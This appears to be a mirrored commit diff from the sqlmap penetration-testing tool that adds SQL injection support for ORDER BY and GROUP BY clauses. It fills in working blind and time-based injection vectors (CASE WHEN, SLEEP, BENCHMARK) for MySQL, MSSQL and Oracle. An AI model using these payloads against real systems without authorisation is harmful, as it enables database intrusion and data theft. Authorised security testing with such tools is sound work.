mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2025-01-24 08:14:24 +03:00
Done with support for injection in ORDER BY and GROUP BY (hopefully)
This commit is contained in:
parent
91c3cf8fd0
commit
9d55c4da87
|
@ -155,14 +155,14 @@ class Agent:
|
|||
# payload, do not put a space after the prefix
|
||||
if kb.technique == 4:
|
||||
query = kb.injection.prefix
|
||||
elif kb.injection.clause == [2, 3] or kb.injection.clause == [ 2 ]:
|
||||
if kb.technique != 3:
|
||||
query = kb.injection.prefix
|
||||
elif kb.technique and kb.technique in kb.injection.data:
|
||||
where = kb.injection.data[kb.technique].where
|
||||
|
||||
if where == 3:
|
||||
query = kb.injection.prefix
|
||||
elif kb.injection.clause == [2, 3] or kb.injection.clause == [ 2 ]:
|
||||
if kb.technique != 3:
|
||||
query = kb.injection.prefix
|
||||
|
||||
if query is None:
|
||||
query = "%s " % kb.injection.prefix
|
||||
|
@ -212,6 +212,12 @@ class Agent:
|
|||
|
||||
payload = payload.replace("[ORIGVALUE]", origvalue)
|
||||
|
||||
if kb.dbms is not None:
|
||||
# NOTE: ugly hack due to queries.xml's <inference> tag
|
||||
# starting with 'AND ' string
|
||||
inferenceQuery = queries[kb.dbms].inference.query[4:]
|
||||
payload = payload.replace("[INFERENCE]", inferenceQuery)
|
||||
|
||||
return payload
|
||||
|
||||
def getComment(self, reqObj):
|
||||
|
|
|
@ -402,7 +402,6 @@ Formats:
|
|||
<risk>1</risk>
|
||||
<clause>1</clause>
|
||||
<where>1</where>
|
||||
<vector></vector>
|
||||
<request>
|
||||
<payload>AND [RANDNUM]=[RANDNUM]</payload>
|
||||
</request>
|
||||
|
@ -418,7 +417,6 @@ Formats:
|
|||
<risk>3</risk>
|
||||
<clause>1</clause>
|
||||
<where>1</where>
|
||||
<vector></vector>
|
||||
<request>
|
||||
<payload>OR [RANDNUM]=[RANDNUM]</payload>
|
||||
</request>
|
||||
|
@ -430,6 +428,24 @@ Formats:
|
|||
|
||||
|
||||
<!-- Boolean-based blind tests - GROUP BY and ORDER BY clauses -->
|
||||
<!-- TODO: check against Microsoft Access and SAP MaxDB -->
|
||||
<!-- NOTE: this does not behave as expected against SQLite -->
|
||||
<test>
|
||||
<title>Generic boolean-based blind - GROUP BY and ORDER BY clauses (append)</title>
|
||||
<stype>1</stype>
|
||||
<level>3</level>
|
||||
<risk>1</risk>
|
||||
<clause>2,3</clause>
|
||||
<where>1</where>
|
||||
<vector>, (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/0 END))</vector>
|
||||
<request>
|
||||
<payload>, (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/0 END))</payload>
|
||||
</request>
|
||||
<response>
|
||||
<comparison>, (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/0 END))</comparison>
|
||||
</response>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>MySQL >= 5.0 boolean-based blind - GROUP BY and ORDER BY clauses (append)</title>
|
||||
<stype>1</stype>
|
||||
|
@ -437,7 +453,7 @@ Formats:
|
|||
<risk>1</risk>
|
||||
<clause>2,3</clause>
|
||||
<where>1</where>
|
||||
<vector></vector>
|
||||
<vector>, (SELECT (CASE WHEN (ORD(MID((%s), %d, 1)) > %d) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))</vector>
|
||||
<request>
|
||||
<payload>, (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))</payload>
|
||||
</request>
|
||||
|
@ -457,7 +473,7 @@ Formats:
|
|||
<risk>1</risk>
|
||||
<clause>2,3</clause>
|
||||
<where>1</where>
|
||||
<vector></vector>
|
||||
<vector>, (SELECT (CASE WHEN (ORD(MID((%s), %d, 1)) > %d) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</vector>
|
||||
<request>
|
||||
<payload>, (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>
|
||||
</request>
|
||||
|
@ -476,7 +492,7 @@ Formats:
|
|||
<risk>1</risk>
|
||||
<clause>3</clause>
|
||||
<where>1</where>
|
||||
<vector></vector>
|
||||
<vector>, (SELECT (CASE WHEN (ASCII(SUBSTRING((%s), %d, 1)) > %d) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</vector>
|
||||
<request>
|
||||
<payload>, (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload>
|
||||
</request>
|
||||
|
@ -495,7 +511,7 @@ Formats:
|
|||
<risk>1</risk>
|
||||
<clause>3</clause>
|
||||
<where>1</where>
|
||||
<vector></vector>
|
||||
<vector>, (SELECT (CASE WHEN (ASCII(SUBSTR((%s), %d, 1)) > %d) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL)</vector>
|
||||
<request>
|
||||
<payload>, (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL)</payload>
|
||||
</request>
|
||||
|
@ -507,24 +523,6 @@ Formats:
|
|||
</details>
|
||||
</test>
|
||||
|
||||
<!-- TODO: check against Microsoft Access and SAP MaxDB -->
|
||||
<!-- NOTE: this does not behave as expected against SQLite -->
|
||||
<test>
|
||||
<title>Generic boolean-based blind - GROUP BY and ORDER BY clauses (append)</title>
|
||||
<stype>1</stype>
|
||||
<level>3</level>
|
||||
<risk>1</risk>
|
||||
<clause>2,3</clause>
|
||||
<where>1</where>
|
||||
<vector></vector>
|
||||
<request>
|
||||
<payload>, (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/0 END))</payload>
|
||||
</request>
|
||||
<response>
|
||||
<comparison>, (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/0 END))</comparison>
|
||||
</response>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>MySQL >= 5.0 boolean-based blind - GROUP BY and ORDER BY clauses (replace)</title>
|
||||
<stype>1</stype>
|
||||
|
@ -552,7 +550,7 @@ Formats:
|
|||
<risk>1</risk>
|
||||
<clause>2,3</clause>
|
||||
<where>3</where>
|
||||
<vector></vector>
|
||||
<vector>(SELECT (CASE WHEN (ORD(MID((%s), %d, 1)) > %d) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</vector>
|
||||
<request>
|
||||
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>
|
||||
</request>
|
||||
|
@ -571,7 +569,7 @@ Formats:
|
|||
<risk>1</risk>
|
||||
<clause>3</clause>
|
||||
<where>3</where>
|
||||
<vector></vector>
|
||||
<vector>(SELECT (CASE WHEN (ASCII(SUBSTRING((%s), %d, 1)) > %d) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</vector>
|
||||
<request>
|
||||
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload>
|
||||
</request>
|
||||
|
@ -590,7 +588,7 @@ Formats:
|
|||
<risk>1</risk>
|
||||
<clause>3</clause>
|
||||
<where>3</where>
|
||||
<vector></vector>
|
||||
<vector>(SELECT (CASE WHEN (ASCII(SUBSTR((%s), %d, 1)) > %d) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL)</vector>
|
||||
<request>
|
||||
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL)</payload>
|
||||
</request>
|
||||
|
@ -611,7 +609,7 @@ Formats:
|
|||
<risk>1</risk>
|
||||
<clause>2,3</clause>
|
||||
<where>3</where>
|
||||
<vector></vector>
|
||||
<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/0 END))</vector>
|
||||
<request>
|
||||
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/0 END))</payload>
|
||||
</request>
|
||||
|
@ -1216,7 +1214,7 @@ Formats:
|
|||
<risk>1</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<where>1</where>
|
||||
<vector>AND IF((%s), [RANDNUM], SLEEP([SLEEPTIME]))</vector>
|
||||
<vector>AND IF(([INFERENCE]), [RANDNUM], SLEEP([SLEEPTIME]))</vector>
|
||||
<request>
|
||||
<payload>AND SLEEP([SLEEPTIME])</payload>
|
||||
</request>
|
||||
|
@ -1236,7 +1234,7 @@ Formats:
|
|||
<risk>1</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<where>1</where>
|
||||
<vector>AND IF((%s), [RANDNUM], BENCHMARK(5000000, MD5('[SLEEPTIME]'))</vector>
|
||||
<vector>AND IF(([INFERENCE]), [RANDNUM], BENCHMARK(5000000, MD5('[SLEEPTIME]'))</vector>
|
||||
<request>
|
||||
<payload>AND BENCHMARK(5000000, MD5('[SLEEPTIME]'))</payload>
|
||||
</request>
|
||||
|
@ -1303,7 +1301,7 @@ Formats:
|
|||
<risk>3</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<where>1</where>
|
||||
<vector>OR IF((%s), [RANDNUM], SLEEP([SLEEPTIME]))</vector>
|
||||
<vector>OR IF(([INFERENCE]), [RANDNUM], SLEEP([SLEEPTIME]))</vector>
|
||||
<request>
|
||||
<payload>OR SLEEP([SLEEPTIME])</payload>
|
||||
</request>
|
||||
|
@ -1323,7 +1321,7 @@ Formats:
|
|||
<risk>3</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<where>1</where>
|
||||
<vector>OR IF((%s), [RANDNUM], BENCHMARK(5000000, MD5('[SLEEPTIME]'))</vector>
|
||||
<vector>OR IF(([INFERENCE]), [RANDNUM], BENCHMARK(5000000, MD5('[SLEEPTIME]'))</vector>
|
||||
<request>
|
||||
<payload>OR BENCHMARK(5000000, MD5('[SLEEPTIME]'))</payload>
|
||||
</request>
|
||||
|
|
Loading…
Reference in New Issue
Block a user